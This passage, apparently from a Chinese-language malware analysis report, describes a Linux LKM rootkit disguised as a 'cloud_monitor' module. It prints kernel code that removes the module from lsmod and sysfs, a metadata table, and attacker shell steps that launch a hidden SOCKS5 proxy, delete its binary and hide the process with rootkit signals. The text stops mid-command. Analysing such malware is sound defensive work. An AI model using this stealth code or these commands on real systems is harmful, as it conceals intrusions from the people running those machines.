style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">THIS_MODULE</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-&gt;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">list</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">.</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">prev</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">list_del</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">(</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&amp;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">THIS_MODULE</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-&gt;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">list</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">);     </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// 从 lsmod 不可见</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">}</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// 删除 sect_attrs 防止 sysfs 暴露</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">tidy</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">() {</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">kfree</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">(</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">THIS_MODULE</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-&gt;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">sect_attrs</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">);</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">THIS_MODULE</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-&gt;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">sect_attrs</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">NULL</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">;   </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// /sys/module/ 不可见</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">}</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">Rootkit 元数据</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="170" width="170" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">属性</span></font></span></b></p></td><td data-colwidth="682" width="682" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">值</span></font></span></b></p></td></tr><tr><td data-colwidth="170" width="170" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">模块名</span></font></span></p></td><td data-colwidth="682" width="682" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">cloud_monitor</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">(伪装云监控)</span></span></p></td></tr><tr><td data-colwidth="170" width="170" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">许可证</span></font></span></p></td><td data-colwidth="682" width="682" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">&#34;Dual BSD/GPL&#34; (虚假)</span></span></p></td></tr><tr><td data-colwidth="170" width="170" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">作者</span></font></span></p></td><td data-colwidth="682" width="682" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">m0nad (开源 LKM rootkit 作者)</span></span></p></td></tr><tr><td data-colwidth="170" width="170" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">描述</span></font></span></p></td><td data-colwidth="682" width="682" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">&#34;LKM rootkit&#34;</span></span></p></td></tr><tr><td data-colwidth="170" width="170" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">兼容内核</span></font></span></p></td><td data-colwidth="682" width="682" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Linux 2.6.18 ~ 5.7+ (支持 x86_64、ARM64)</span></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">部署 SS5 SOCKS5 代理</span></span></p><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 从隐藏在 /etc/$hhide/ 的 dnsresolve 复制 SS5 代理</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">cp</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /etc/ad12e85f/dnsresolve /</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$EXE</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># $EXE = md5sum($RANDOM)[:8]</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 以静默、线程模式启动 SS5 SOCKS5 代理</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">/</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$EXE</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-m</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-t</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-p</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /usr/share/terminfo/w/wy66-qa </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-b</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(17,102,68);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">0</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">.0.0.0:</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$port</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 删除可执行文件 (进程仍在内存中运行)</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rf</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$EXE</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 通过 rootkit 信号隐藏 SS5 进程</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">kill</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-41</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,153,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">`cat /usr/share/terminfo/w/wy66-qa`</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 通过 rootkit 信号隐藏内核模块</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">kill</span></span><span 